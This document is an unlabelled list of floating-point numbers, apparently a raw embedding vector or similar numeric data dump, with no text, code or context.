-0.001148587092757225, -0.002417417010292411, -0.03279216215014458, 0.0024030597414821386, 0.019612126052379608, 0.0149316331371665, 0.03373974561691284, 0.014874203130602837, 0.009332270361483097, 0.011572015471756458, -0.029231542721390724, -0.0037903375923633575, -0.007946787402033806, 0.008097539655864239, 0.04169371351599693, -0.02716408483684063, -0.012411919422447681, -0.007946787402033806, 0.02099042944610119, -0.016238151118159294, -0.01955469511449337, 0.004565633833408356, 0.054443031549453735, -0.016812443733215332, 0.0010516750626266003, -0.055677760392427444, 0.04077484458684921, 0.002918129088357091, 0.03348131477832794, -0.009037945419549942, -0.00783910695463419, 0.04376117140054703, -0.0006048029172234237, 0.0033721800427883863, 0.0015541819157078862, 0.0011216670973226428, 0.017630811780691147, -0.02053099498152733, 0.03282087668776512, 0.019726984202861786, 0.05484503507614136, -0.007882178761065006, -0.00645003467798233, 0.027121013030409813, -0.00485636992380023, -0.010157817043364048, 0.020775070413947105, -0.011112580075860023, 0.03158614784479141, -0.01069621741771698, -0.00764528289437294, 0.0004298228304833174, 0.007444280199706554, 0.020688924938440323, -0.021837512031197548, 0.00485636992380023, 0.0227133110165596, -0.004730743356049061, -0.014220944605767727, -0.011593551374971867, -0.027594806626439095, 0.024579765275120735, -0.014335802756249905, 0.0024120330344885588, 0.00487431650981307, 0.011105401441454887, -0.018391750752925873, 0.015132635831832886, -0.01653965376317501, 0.007472995202988386, -0.015592070296406746, -0.003959036432206631, -0.007236098870635033, -0.01589357480406761, -0.018865544348955154, -0.03078213520348072, -0.020947357639670372, 0.011895055882632732, -0.018205106258392334, 0.010768004693090916, -0.010050137527287006, -0.012189380824565887, 0.02120579034090042, -0.020631495863199234, -0.035864632576704025, -0.008614403195679188, 0.02144986391067505, 0.004027233459055424, 0.008241112343966961, -0.03707065060734749, 0.049504105001688004, 0.019123975187540054, 0.005358876660466194, 0.0559074804186821, -0.006141352001577616, 0.02534070424735546, 0.018650183454155922, 0.03635278344154358, 0.02624521590769291, 0.0030078624840825796, -0.0009484817273914814, 0.0018395340302959085, -0.051054697483778, 0.035548772662878036, -0.01122026052325964, -0.006579250562936068, 0.01473062951117754, 0.0025125343818217516, -0.003068881342187524, -0.008772334083914757, -0.02486691065132618, -0.02755173295736313, 0.032332729548215866, 0.017803100869059563, -0.023445535451173782, -0.04088970273733139, 0.03787466138601303, 0.046489063650369644, -0.006557714659720659, -0.015663856640458107, -0.013804581947624683, 0.02539813332259655, -0.0011710204416885972, -0.015276208519935608, 0.021105289459228516, -0.018664540722966194, 0.03339517116546631, 0.012699066661298275, -0.0015120073221623898, 0.009030766785144806, 0.008291363716125488, -0.043416593223810196, -0.013388218358159065, 0.020516637712717056, 0.0050932662561535835, 0.023373747244477272, -0.04468004032969475, 0.05481632053852081, 0.04548405110836029, 0.009554808959364891, -0.03583591803908348, -0.001678014057688415, -0.042239293456077576, 0.004274897743016481, 0.006482338532805443, 0.006988435052335262, -0.010157817043364048, -0.030150411650538445, -0.019052188843488693, -0.008549795486032963, 0.02146422117948532, -0.0014294525608420372, -0.038104377686977386, 0.004903031513094902, 0.011593551374971867, -0.0009457897394895554, -0.01606586202979088, -0.008750798180699348, 0.015146993100643158, -0.019569052383303642, -0.006317229010164738, 0.0011701231123879552, -0.010416249744594097, -0.014414768666028976, 0.021636510267853737, 0.010164995677769184, 0.015778714790940285, 0.0005419895751401782, 0.00032977014780044556, -0.011292046867311, -0.05243300274014473, 0.017573382705450058, 0.002464078366756439, 0.03465861827135086, 0.03201686590909958, 0.02185186930000782, -0.037185508757829666, 0.009762990288436413, -0.01239756215363741, -0.025886282324790955, -0.002419211668893695, -0.022038515657186508, -0.0065720719285309315, -0.0027566091157495975, -0.0231009591370821, 0.022742025554180145, 0.0209330003708601, -0.0035031908191740513, -0.02179444022476673, 0.03170100599527359, -0.015362353064119816, -0.013172858394682407, 0.0019902861677110195, -0.032591160386800766, -0.00048007353325374424, 0.00478817243129015, -0.019583411514759064, 0.016697585582733154, -0.0011656364658847451, -0.003955447115004063, 0.020703282207250595, -0.013452826999127865, -0.008147790096700191, -0.019569052383303642, -0.042296722531318665, 0.027465589344501495, 0.00787500012665987, -0.0029952998738735914, -0.005847026593983173, 0.006773074623197317, 0.006981255952268839, 0.006722824182361364, -0.006004957016557455, 0.023057887330651283, 0.008793869987130165, -0.03434275463223457, -0.012677530758082867, 0.00041165182483382523, -0.05274886265397072, 0.00961941760033369, 0.026675935834646225, 0.023144030943512917, -0.013682544231414795, -0.004737921990454197, -0.005746524780988693, -0.00016185655840672553, -0.01589357480406761, -0.007602211087942123, -0.01046650018543005, -0.02613035775721073, 0.009296377189457417, 0.009267662651836872, 0.010322926566004753, 0.03411303833127022, -0.061851415783166885, -0.011363834142684937, -0.004113377537578344, 0.01460141409188509, 0.020947357639670372, 0.007774499244987965, -0.009195875376462936, -0.007745784241706133, -0.0016555807087570429, -0.00813343282788992, 0.02001413144171238, 0.013337967917323112, -0.001920294133014977, 0.005276322364807129, -0.023904969915747643, 0.022756382822990417, 0.005179409869015217, 0.017630811780691147, -0.019396765157580376, -0.0055814157240092754, 0.009425593540072441, 0.02613035775721073, -0.007810392417013645, 0.001144997775554657, 0.009777347557246685, 0.012778031639754772, 0.009246126748621464, -0.04378988593816757, 0.011083865538239479, -0.042095717042684555, -0.010129102505743504, -0.0002925307780969888, -0.03279216215014458, -0.005710631608963013, 0.0014366311952471733, 0.012612922117114067, 0.012620100751519203, -0.01483113132417202, -0.007896536961197853, 0.027781451120972633, -0.000900923041626811, -0.010193711146712303, -0.013086714781820774, 0.007017149589955807, 0.004081073682755232, -0.040918417274951935, -0.015376710332930088, 0.03348131477832794, 0.0076596406288445, -0.01332361064851284, -0.008772334083914757, -0.002329478273168206, -0.014759344980120659, 0.007989859208464622, 0.015118278563022614, -0.03322288393974304, 0.003722140099853277, -0.013998406007885933, -0.004641009960323572, 0.023675251752138138, -0.0004367771907709539, 0.041636284440755844, -0.004113377537578344, 0.005689095705747604, -0.013854832388460636, 0.015376710332930088, -0.006371069233864546, -0.02499612793326378, -0.009037945419549942, -0.012684709392488003, -0.05447174608707428, 0.018650183454155922, -0.00534810870885849, 0.01417787279933691, 0.022325662896037102, 0.030293986201286316, 0.00997835025191307, -0.01207452267408371, 0.005786007735878229, 0.015233136713504791, 0.023373747244477272, -0.02172265388071537, 0.02894439548254013, -0.005527575500309467, -0.0006931902607902884, -0.015534641221165657, 0.023057887330651283, -0.027393803000450134, -0.017214449122548103, -0.017171377316117287, -0.024823838844895363, -0.010947471484541893, 0.0017623633611947298, -0.016912944614887238, -0.007953966036438942, 0.004256951157003641, 0.012577028945088387, 0.02256973646581173, 0.036525070667266846, -0.010322926566004753, 0.015419782139360905, 0.004005697555840015, 0.0013145938282832503, -0.001651093945838511, -0.0091886967420578, 0.01936805061995983, -0.015017776750028133, 0.057458072900772095, -0.005409127566963434, -0.01831996440887451, -0.0076596406288445, 0.019640840590000153, 0.009511737152934074, -0.004913799464702606, -0.03445761278271675, -0.020315634086728096, -0.011493049561977386, 0.022612808272242546, 0.003722140099853277, 0.0015057259006425738, 0.005707042291760445, -0.012655994854867458, -0.007702712435275316, -0.011349476873874664, 0.0006604376249015331, 0.008880014531314373, 0.006001367699354887, 0.005326572805643082, 0.024895625188946724, -0.0036180494353175163, 0.005326572805643082, 0.011371012777090073, -0.0354626290500164, 0.0014321445487439632, -0.01686987280845642, -0.03819052129983902, -0.029245899990200996, 0.018205106258392334, 0.020789427682757378, -0.04312944784760475, -0.01626686565577984, 0.05504603683948517, 0.0213206484913826, 0.002010027412325144, -0.03666864335536957, -0.02473769523203373, -0.015793073922395706, 0.000509685545694083, 0.00009550995309837162, 0.009762990288436413, -0.014149157330393791, -0.031126711517572403, -0.0032878306228667498, 0.027408160269260406, 0.0106603242456913, 0.00006169169500935823, 0.02269895374774933, 0.031270284205675125, 0.0012293471954762936, -0.025053557008504868, -0.04114813357591629, -0.03503190726041794, -0.006112636998295784, -0.0073401895351707935, -0.009274841286242008, 0.0022307715844362974, 0.058175936341285706, -0.016453510150313377, 0.001388175180181861, 0.018463538959622383, 0.023129673674702644, 0.02047356590628624, -0.03655378520488739, -0.018090248107910156, 0.011600730009377003, -0.0005303242360241711, 0.03824795037508011, 0.01791795901954174, -0.01365382969379425, -0.026331359520554543, 0.02323017455637455, 0.01234013307839632, 0.014256837777793407, -0.002054894110187888, 0.009798884391784668, -0.028786465525627136, -0.039540112018585205, 0.0106603242456913, -0.001786591368727386, -0.0020925821736454964, -0.006105458363890648, 0.007516067009419203, 0.011636623181402683, 0.009762990288436413, 0.008844121359288692, -0.020114632323384285, 0.008104718290269375, -0.014486555010080338, -0.009554808959364891, -0.009698382578790188, -0.02420647442340851, -0.034945763647556305, 0.01791795901954174, -0.019841842353343964, -0.012325775809586048, -0.02120579034090042, 0.02317274548113346, 0.021349363029003143, 0.026690293103456497, -0.014859845861792564, -0.02670465037226677, 0.02144986391067505, 0.022210802882909775, -0.03365360200405121, 0.02683386765420437, -0.0081693259999156, -0.01582178846001625, -0.0027260996866971254, -0.01050239335745573, 0.010186532512307167, 0.06443573534488678, 0.016166364774107933, 0.02086121402680874, 0.0007524142856709659, -0.03109799697995186, -0.015132635831832886, 0.007304296363145113, -0.004752279259264469, -0.005301447585225105, 0.04169371351599693, -0.024522334337234497, 0.019439836964011192, -0.013869189657270908, 0.003357822773978114, 0.030896993353962898, -0.010035780258476734, -0.01856403984129429, 0.012856997549533844, 0.012038628570735455, 0.006604375783354044, -0.03864995762705803, 0.02966226264834404, -0.008578510023653507, 0.010222425684332848, -0.022483592852950096, 0.00002011990363826044, -0.030868278816342354, -0.0548737496137619, -0.00533016212284565, 0.0039051962085068226, -0.008470830507576466, 0.004601527005434036, 0.008743619546294212, 0.00911691039800644, -0.009691203944385052, -0.02282816916704178, -0.009885028004646301, -0.01948290877044201, -0.0032573214266449213, 0.015204422175884247, -0.000648323621135205, -0.011170010082423687, -0.013804581947624683, -0.002011822070926428, 0.006780253257602453, 0.018276892602443695, 0.043531451374292374, -0.04493847116827965, 0.025613492354750633, -0.006367479916661978, -0.004321558866649866, 0.003113748040050268, 0.019899271428585052, 0.010459321551024914, 0.005663970485329628, 0.0033955106046050787, 0.02021513320505619, 0.022081587463617325, 0.031528715044260025, 0.009045124053955078, 0.022225160151720047, -0.005452199373394251, -0.016295580193400383, 0.04232543706893921, -0.011299225501716137, 0.0030329879373311996, 0.019052188843488693, 0.024378761649131775, 0.0020046434365212917, -0.033510029315948486, 0.006805378943681717, -0.00645003467798233, 0.00872926227748394, 0.00892308633774519, 0.00690588029101491, 0.010021422989666462, -0.006004957016557455, 0.022196445614099503, -0.0023887022398412228, 0.02192365750670433, -0.005602951627224684, 0.02815474197268486, -0.006360301282256842, -0.0040559484623372555, -0.01141408458352089, 0.020100275054574013, -0.003819052129983902, -0.026087285950779915, -0.02420647442340851, 0.015563355758786201, -0.041636284440755844, -0.0027494304813444614, -0.03109799697995186, -0.006475159898400307, 0.015491568483412266, -0.0117443036288023, 0.01079671923071146, 0.014063013717532158, 0.006022903602570295, -0.01325182430446148, -0.011966842226684093, 0.025627849623560905, -0.007796035148203373, 0.009174339473247528, 0.006467981263995171, -0.0006003162707202137, -0.03425661101937294, -0.032648589462041855, -0.008987694047391415, -0.012318597175180912, 0.02848496101796627, -0.03109799697995186, -0.017013447359204292, 0.011507407762110233, -0.02223951742053032, 0.015965361148118973, 0.009396878071129322, -0.010287033393979073, 0.004741511307656765, 0.02199544385075569, -0.022727668285369873, -0.026029855012893677, 0.01371125876903534, 0.02658979222178459, 0.08241112530231476, 0.0050932662561535835, -0.028039883822202682, -0.0012087085051462054, -0.019281907007098198, -0.003722140099853277, -0.0021248862612992525, 0.006274157203733921, -0.005703452974557877, 0.015491568483412266, 0.025570420548319817, 0.0006734489579685032, 0.007289939094334841, 0.007580675184726715, 0.0008874630439095199, 0.012038628570735455, 0.0012105031637474895, -0.01738673821091652, 0.013804581947624683, -0.018090248107910156, 0.013582042418420315, 0.00100860302336514, 0.0113566555082798, -0.02284252643585205, 0.01628122292459011, -0.006281335838139057, -0.0031711773481220007, -0.023589108139276505, -0.02389061264693737, -0.006701287813484669, -0.015735642984509468, 0.012139130383729935, 0.004590759053826332, -0.019281907007098198, 0.008937443606555462, -0.0006236468907445669, 0.00892308633774519, 0.004368220455944538, 0.001907731406390667, -0.012821103446185589, 0.0011862751562148333, -0.017946673557162285, -0.007673997897654772, 0.0009745043935254216, 0.0050466046668589115, -0.036381497979164124, 0.028843894600868225, 0.006292103789746761, -0.026675935834646225, -0.005480914376676083, 0.0009197670151479542, -0.016841158270835876, 0.010387535206973553, 0.03150000050663948, -0.001162047148682177, 0.006008546333760023, -0.003562414785847068, -0.021622152999043465, -0.012218095362186432, 0.003711372148245573, 0.0009323296835646033, 0.010121923871338367, 0.016381723806262016, 0.013065178878605366, -0.010739289224147797, -0.004099020268768072, -0.017602097243070602, -0.0010480857454240322, 0.007551960181444883, 0.010344462469220161, 0.004612295422703028, -0.0006205062381923199, 0.004974817857146263, 0.0011835831683129072, 0.013000570237636566, 0.01764516904950142, -0.0035444681998342276, 0.035261623561382294, -0.027738379314541817, -0.010114745236933231, 0.016582727432250977, 0.013366682454943657, 0.01661144196987152, 0.03589334711432457, -0.008420579135417938, 0.020688924938440323, -0.002187699545174837, -0.002954022493213415, 0.00305093452334404, -0.0052727325819432735, -0.0019310620846226811, 0.007810392417013645, -0.0016519913915544748, 0.008607224561274052, 0.03394075110554695, 0.0326773039996624, 0.0159510038793087, -0.012469349429011345, -0.0018368420423939824, -0.017903601750731468, 0.011371012777090073, 0.006564893294125795, 0.02671900764107704, 0.0020010541193187237, 0.006467981263995171, 0.025757066905498505, -0.009841956198215485, 0.018147677183151245, 0.012246809899806976, -0.00281403842382133, -0.049647677689790726, -0.033768460154533386, 0.02328760363161564, -0.031155426055192947, -0.009511737152934074, 0.006988435052335262, 0.01975569874048233, 0.02159343846142292, -0.018793756142258644, -0.019640840590000153, -0.008657475933432579, -0.016582727432250977, 0.022426163777709007, -0.012419098056852818, -0.0041277348063886166, 0.008413400501012802, 0.002306147711351514, -0.015319281257689, 0.030351415276527405, 0.0405738390982151, 0.0012194764567539096, 0.007307885680347681, 0.008808227255940437, -0.023603465408086777, 0.031270284205675125, -0.03109799697995186, 0.03543391451239586, 0.017803100869059563, 0.008183683268725872, -0.005193767603486776, -0.00643208809196949, 0.03379717469215393, 0.022139016538858414, 0.010531107895076275, 0.024752052500844002, 0.021363720297813416, 0.02683386765420437, 0.012447812594473362, 0.010689038783311844, 0.037300366908311844, -0.0005814722389914095, -0.021277576684951782, 0.0009107937221415341, 0.03870738670229912, -0.0059654745273292065, 0.0001987594150705263, 0.020459208637475967, -0.039224252104759216, -0.021234504878520966, 0.01869325526058674, 0.017358023673295975, 0.024436190724372864, 0.036927077919244766, -0.019181404262781143, -0.0008093949873000383, 0.028757750988006592, -0.016051504760980606, -0.04967639222741127, -0.02178008295595646, -0.026144715026021004, 0.007121240254491568, 0.01483113132417202, -0.021622152999043465, 0.01856403984129429, 0.025369418784976006, -0.00012674838944803923, 0.0024981771130114794, -0.011686873622238636, 0.025498634204268456, 0.0034152520820498466, -0.006902290973812342, 0.016769371926784515, -0.010631609708070755, 0.0013504872331395745, 0.0159510038793087, -0.010875684209167957, -0.001267932471819222, 0.04384731501340866, -0.009841956198215485, 0.019210120663046837, 0.012950319796800613, 0.013833296485245228, -0.021478578448295593, -0.013790224678814411, -0.020832499489188194, -0.009913742542266846, -0.011722767725586891, -0.039138104766607285, -0.003332697320729494, 0.0006191602442413568, -0.006791021209210157, -0.001678014057688415, -0.004798940382897854, -0.003944678697735071, 0.0076093897223472595, -0.029116684570908546, -0.008212397806346416, -0.0016968579730018973, -0.009332270361483097, -0.003944678697735071, -0.0047774044796824455, 0.03052370250225067, 0.024838196113705635, 0.00153802998829633, 0.019411122426390648, 0.009490201249718666, 0.006209549028426409, -0.013675365597009659, -0.0003037474525626749, 0.003427814692258835, -0.01653965376317501, 0.014106085523962975, 0.009827598929405212, 0.007516067009419203, -0.006231085397303104, 0.01836303621530533, 0.021306291222572327, -0.03391203656792641, -0.020818142220377922, -0.01178019680082798, -0.016482224687933922, -0.012749317102134228, 0.012749317102134228, 0.010545465163886547, -0.016711942851543427, -0.02027256228029728, -0.00590804498642683, 0.009009229950606823, 0.003474476048722863, -0.01580743119120598, 0.01007885206490755, 0.0027835292275995016, -0.046891070902347565, 0.009095374494791031, -0.0032393746078014374, -0.00016510940622538328, 0.002980942605063319, 0.001276905881240964, -0.013431291095912457, 0.03870738670229912, -0.012971855700016022, -0.01836303621530533, -0.015089563094079494, 0.015175707638263702, 0.0014904713025316596, 0.05447174608707428, 0.03859252855181694, 0.010035780258476734, 0.02611600048840046, -0.001264343154616654, -0.002216414315626025, -0.006256210617721081, -0.004795351065695286, -0.0030975958798080683, 0.0014635513070970774, 0.02269895374774933, -0.021277576684951782, -0.001297544571571052, 0.00036409313906915486, 0.00012809438339900225, 0.011112580075860023, -0.012354490347206593, 0.0039016068913042545, -0.022009801119565964, 0.010681860148906708, -0.005175820551812649, 0.016108933836221695, -0.01712830550968647, 0.0018987581133842468, 0.005283500999212265, -0.01506084855645895, 0.04267001152038574, 0.011851983144879341, -0.014572699554264545, 0.022225160151720047, -0.01155047956854105, -0.04959024861454964, 0.01639608107507229, -0.0032375799492001534, -0.015922289341688156, -0.018736327067017555, 0.0033991001546382904, -0.008334435522556305, -0.02743687480688095, 0.009762990288436413, 0.003609076142311096, -0.008679011836647987, 0.02572835236787796, -0.03951139748096466, 0.004375399090349674, 0.03491704910993576, 0.005972653161734343, 0.014658843167126179, 0.011737124994397163, -0.030494987964630127, 0.02099042944610119, -0.01869325526058674, -0.017214449122548103, 0.01554899848997593, -0.01639608107507229, 0.00951891578733921, -0.034687332808971405, -0.019927985966205597, -0.03158614784479141, -0.003962625749409199, -0.008355971425771713, -0.002180520910769701, -0.00694177346304059, 0.005832668859511614, -0.0013451032573357224, 0.0035265213809907436, -0.02139243483543396, -0.026331359520554543, -0.03712807968258858, -0.020760713145136833, 0.0015766152646392584, -0.00892308633774519, 0.007437101565301418, 0.014256837777793407, -0.02526891604065895, 0.02480948157608509, 0.02723587304353714, 0.013538970611989498, 0.005096855573356152, 0.0013190805912017822, -0.01666887104511261, 0.00820521917194128, 0.009360984899103642, 0.0034188413992524147, -0.009554808959364891, -0.02186622843146324, 0.03833409398794174, -0.014450661838054657, -0.002178726252168417, 0.032591160386800766, 0.012426276691257954, -0.0007932430016808212, 0.007559139281511307, -0.01037317793816328, -0.023603465408086777, -0.039080675691366196, -0.001037317793816328, 0.016108933836221695, -0.002291790209710598, -0.004723564721643925, 0.010229604318737984, 0.008384685963392258, 0.0227133110165596, -0.01483113132417202, -0.014802416786551476, -0.010401892475783825, 0.022167731076478958, -0.0023869075812399387, -0.003998518921434879, 0.007516067009419203, 0.008190861903131008, -0.011493049561977386, 0.017831815406680107, -0.007638104259967804, -0.028858251869678497, -0.013151322491466999, 0.006173655856400728, -0.0015972539549693465, 0.002464078366756439, 0.01365382969379425, 0.001645709970034659, 0.02212465927004814, -0.004235415253788233, -0.018793756142258644, 0.023345032706856728, -0.000003747069285964244, 0.003433198668062687, 0.009195875376462936, 0.010710574686527252, -0.04660392180085182, 0.003454734804108739, -0.01262727938592434, 0.017444167286157608, -0.00455845519900322, -0.010645966976881027, -0.010947471484541893, 0.012526778504252434, 0.008607224561274052, 0.03460118547081947, -0.0008609916549175978, 0.01325182430446148, 0.012081701308488846, -0.002733278553932905, -0.024105971679091454, 0.0022217982914298773, 0.021579081192612648, 0.003718550782650709, -0.00401646550744772, 0.02106221579015255, -0.0006940875900909305, 0.013259002938866615, -0.014515269547700882, -0.03135642781853676, 0.026087285950779915, -0.01580743119120598, 0.022742025554180145, 0.006665394641458988, 0.043531451374292374, 0.010868505574762821, -0.0011665337951853871, -0.0019938754849135876, -0.017099590972065926, 0.025082271546125412, 0.011758660897612572, -0.00010089395800605416, -0.000040800641727400944, 0.005513218231499195, -0.021220147609710693, -0.032648589462041855, 0.014508090913295746, -0.007006381638348103, 0.01223963126540184, -0.0032645000610500574, 0.02440747618675232, 0.02368960902094841, 0.015247493982315063, 0.027393803000450134, 0.018678897991776466, -0.002449721097946167, 0.023646537214517593, 0.014960347674787045, -0.022340020164847374, -0.00915280357003212, -0.005197356920689344, -0.01738673821091652, 0.020645853132009506, -0.018032817170023918, -0.01567821390926838, 0.003998518921434879, 0.0020656620617955923, -0.008700547739863396, -0.018162034451961517, -0.0024748463183641434, 0.0024999717716127634, 0.0002709947875700891, -0.010064494796097279, 0.008966158144176006, 0.01290006935596466, 0.024105971679091454, 0.0013352325186133385, -0.005491682328283787, 0.009583523496985435, 0.007254045456647873, -0.019339336082339287, 0.011650980450212955, 0.012189380824565887, -0.023675251752138138, 0.017573382705450058, -0.00457640178501606, 0.01398404873907566, 0.02880082279443741, 0.011055151000618935, 0.003941089380532503, -0.011830447241663933, -0.018994759768247604, 0.03353874385356903, -0.01267035212367773, 0.005452199373394251, 0.005703452974557877, 0.01141408458352089, -0.0018520967569202185, -0.009411236271262169, -0.011988378129899502, -0.005459378007799387, -0.02284252643585205, 0.016051504760980606, -0.0033506439067423344, -0.007121240254491568, -0.00048097086255438626, -0.008585688658058643, 0.025713995099067688, -0.003571388078853488, 0.021277576684951782, -0.001659170025959611, 0.00882258452475071, 0.0016528887208551168, 0.012871354818344116, -0.02020077593624592, 0.002286406233906746, 0.010186532512307167, 0.015233136713504791, -0.00736531475558877, 0.012634458020329475, 0.01995670050382614, -0.009411236271262169, 0.0006743462872691453, -0.01398404873907566, -0.004461543168872595, 0.009655310772359371, 0.018549682572484016, -0.00443282863125205, -0.020373065024614334, -0.0001417787279933691, -0.000510134210344404, -0.00505019398406148, 0.0056783277541399, 0.0021141180768609047, -0.0149316331371665, 0.023976756259799004, 0.005401948932558298, 0.010574180632829666, -0.005376823712140322, 0.003190918592736125, -0.017630811780691147, -0.004493847023695707, -0.011385370045900345, 0.01318721566349268, -0.0227133110165596, -0.02493869885802269, 0.0008416990167461336, 0.014558342285454273, 0.007261224091053009, 0.011564836837351322, -0.014658843167126179, 0.0010462910868227482, -0.013460005633533001, -0.0007874103030189872, -0.003718550782650709, -0.013366682454943657, -0.015864860266447067, 0.005258375313133001, 0.016439152881503105, -0.01923883520066738, 0.013538970611989498, -0.0025825263001024723, 0.01569257117807865, -0.000640247599221766, 0.0002804167743306607, 0.01181608997285366, -0.004414881579577923, -0.005825490225106478, -0.0037580335047096014, -0.014960347674787045, -0.018477896228432655, 0.0006469775689765811, -0.0003692528116516769, -0.01666887104511261, 0.004020054824650288, -0.027192801237106323, -0.007167901378124952, 0.008736440911889076, -0.004806119482964277, 0.00031182344537228346, -0.013194394297897816, 0.013862011022865772, 0.00033762180828489363, -0.0010974390897899866, 0.01299339160323143, 0.00820521917194128, -0.011995556764304638, 0.011579194106161594, 0.008750798180699348, 0.0017381353536620736, 0.0030132464598864317, -0.028958752751350403, -0.0014447072753682733, 0.011069508269429207, 0.006636680103838444, -0.0033093667589128017, -0.006274157203733921, 0.002573553007096052, -0.023703966289758682, -0.018750684335827827, 0.01988491415977478, 0.0005491682095453143, 0.014666021801531315, 0.014666021801531315, -0.012584207579493523, -0.010811076499521732, 0.0009368163882754743, -0.010315747931599617, 0.015706928446888924, -0.02284252643585205, -0.01922447793185711, -0.0014124031877145171, 0.013402575626969337, 0.015965361148118973, -0.010215247049927711, 0.004637420643121004, -0.013704080134630203, -0.008973336778581142, -0.01083261240273714, -0.00021861292771063745, 0.007333010900765657, 0.010028601624071598, -0.003431404009461403, -0.0042820763774216175, -0.013962511904537678, -0.01318721566349268, 0.004264129791408777, 0.008506723679602146, 0.012411919422447681, -0.00483842333778739, -0.003811873495578766, -0.010279854759573936, 0.008671833202242851, -0.027781451120972633, -0.0011871724855154753, 0.003973393701016903, -0.023201460018754005, -0.006091101095080376, -0.0034080734476447105, -0.016309937462210655, 0.004109788220375776, -0.02966226264834404, 0.017113948240876198, 0.01778874360024929, 0.002150011481717229, 0.015448496676981449, 0.0004105301632080227, 0.0074514588341116905, 0.011177188716828823, -0.017932316288352013, 0.005297858268022537, 0.00613417336717248, 0.008506723679602146, 0.029777120798826218, 0.017831815406680107, 0.024594122543931007, 0.009992708452045918, 0.01936805061995983, -0.012447812594473362, -0.0010965417604893446, 0.0013944566017016768, -0.01099054329097271, 0.013194394297897816, -0.008162147365510464, -0.005498860962688923, 0.015764357522130013, 0.0013208752498030663, -0.004192342981696129, 0.01076082605868578, -0.014989062212407589, -0.0067335921339690685, -0.0031693826895207167, 0.017271878197789192, 0.02302917279303074, -0.01089004147797823, 0.00997835025191307, -0.002591499825939536, -0.019123975187540054, -0.00882258452475071, -0.013136965222656727, -0.00332192936912179, 0.014788059517741203, 0.018133319914340973, -0.010488036088645458, -0.0205453522503376, 0.007781677879393101, 0.003876481670886278, -0.007458637468516827, 0.001536235329695046, 0.017027804628014565, 0.004601527005434036, 0.01712830550968647, 0.011055151000618935, 0.0030365772545337677, -0.005972653161734343, 0.009526094421744347, -0.017372380942106247, 0.011083865538239479, -0.003973393701016903, -0.009820420295000076, -0.013266181573271751, -0.002460489049553871, -0.0010956444311887026, -0.021737011149525642, 0.009762990288436413, -0.0032698840368539095, -0.0008708623354323208, -0.01589357480406761, -0.018851187080144882, 0.011083865538239479, -0.009088195860385895, -0.013854832388460636, 0.005014300812035799, -0.01079671923071146, 0.015491568483412266, -0.008743619546294212, -0.014070192351937294, -0.042957156896591187, -0.011170010082423687, 0.0005348108825273812, 0.0009655310423113406, 0.003976983018219471, 0.0018915794789791107, 0.0008749003754928708, 0.01903783157467842, 0.005635255482047796, -0.013007748872041702, 0.008951800875365734, 0.011737124994397163, 0.019267549738287926, 0.0039051962085068226, -0.003700604196637869, 0.02901618182659149, -0.003959036432206631, 0.014816774055361748, -0.011327940970659256, 0.009885028004646301, 0.03038012981414795, -0.009418414905667305, -0.024393118917942047, 0.009332270361483097, -0.024780767038464546, -0.011543300934135914, 0.005613719578832388, -0.002157190116122365, -0.032706018537282944, 0.013302074745297432, 0.0006236468907445669, -0.02133500576019287, -0.008858478628098965, -0.01896604523062706, -0.00589009840041399, 0.0116796949878335, 0.017415452748537064, 0.018420465290546417, 0.0014366311952471733, -0.0000209891968552256, 0.0005855102208442986, -0.005111212842166424, -0.021478578448295593, -0.011722767725586891, 0.00415286049246788, 0.01256985031068325, 0.0027942971792072058, 0.011629444546997547, 0.010071673430502415, 0.010724931955337524, -0.002031563548371196, -0.010588537901639938, 0.0004228684992995113, -0.026001140475273132, 0.018492253497242928, -0.017228806391358376, 0.01936805061995983, -0.01483113132417202, 0.016353009268641472, 0.011385370045900345, 0.0015155966393649578, -0.009360984899103642, -0.008528259582817554, 0.007207384333014488, -0.023876255378127098, -0.0015703339595347643, 0.01988491415977478, 0.013546149246394634, -0.009224590845406055, 0.005567058455199003, -0.004289255011826754, 0.008915907703340054, -0.0237470380961895, -0.02822652831673622, -0.011406905949115753, 0.008607224561274052, -0.00483842333778739, 0.027867594733834267, -0.023258889093995094, -0.002417417010292411, -0.013237467035651207, 0.01988491415977478, -0.02198108658194542, -0.0014626539777964354, -0.0003968458331655711, 0.0023635770194232464, 0.003987750969827175, -0.022225160151720047, 0.011435620486736298, 0.01652529649436474, -0.017817458137869835, 0.013043642975389957, 0.0073796724900603294, 0.006823325529694557, -0.010157817043364048, 0.009561987593770027, 0.0019310620846226811, -0.006475159898400307, 0.0009816830279305577, 0.0040846629999578, -0.005211714189499617, -0.008901550434529781, 0.0004706515173893422, 0.007293528411537409, -0.02172265388071537, -0.007946787402033806, -0.004371809773147106, -0.009971171617507935, 0.009353806264698505, 0.01646786741912365, 0.005226071458309889, 0.008061645552515984, 0.002799681155011058, 0.011851983144879341, 0.0167263001203537, -0.011507407762110233, -0.008255469612777233, -0.03230401128530502, -0.007853464223444462, 0.00613417336717248, 0.004676903132349253, 0.00928919855505228, 0.009913742542266846, 0.015462853945791721, -0.005322983488440514, -0.005800365004688501, 0.004052359145134687, 0.004633831325918436, -0.015836145728826523, -0.008564152754843235, -0.013926618732511997, 0.00801139511168003, 0.002907361136749387, 0.021076573058962822, -0.0009798883693292737, -0.03307930752635002, 0.022655881941318512, 0.007882178761065006, -0.012462170794606209, -0.005129159428179264, -0.0045476872473955154, -0.013976870104670525, -0.02671900764107704, -0.009727097116410732, 0.025355061516165733, -0.0043897563591599464, 0.011299225501716137, 0.026331359520554543, -0.02244052104651928, 0.010545465163886547, -0.018492253497242928, -0.007867821492254734, -0.006288514472544193, -0.0027601984329521656, -0.014149157330393791, 0.01473062951117754, 0.005301447585225105, 0.0003602794895414263, 0.020775070413947105, -0.0066869305446743965, -0.006543357390910387, 0.0032662947196513414, -0.023057887330651283, 0.00036409313906915486, 0.0009664283716119826, 0.020229490473866463, 0.014314266853034496, 0.02539813332259655, -0.017358023673295975, -0.000048203644837485626, -0.012856997549533844, -0.00820521917194128, -0.0007070989813655615, -0.01902347430586815, -0.023416820913553238, 0.003336286637932062, 0.0058577945455908775, 0.010028601624071598, 0.015304923988878727, -0.001920294133014977, -0.00013168371515348554, 0.007745784241706133, -0.0028786465991288424, -0.029891980811953545, 0.035405199974775314, -0.0026525184512138367, 0.019439836964011192, 0.005258375313133001, -0.007279171142727137, -0.012282704003155231, -0.02473769523203373, -0.010588537901639938, 0.021823154762387276, -0.0015129046514630318, -0.015577713027596474, -0.015175707638263702, 0.03620921075344086, -0.012742138467729092, 0.028169099241495132, 0.02328760363161564, 0.013029285706579685, -0.012821103446185589, -0.017673883587121964, -0.009770168922841549, 0.019640840590000153, 0.01935369335114956, 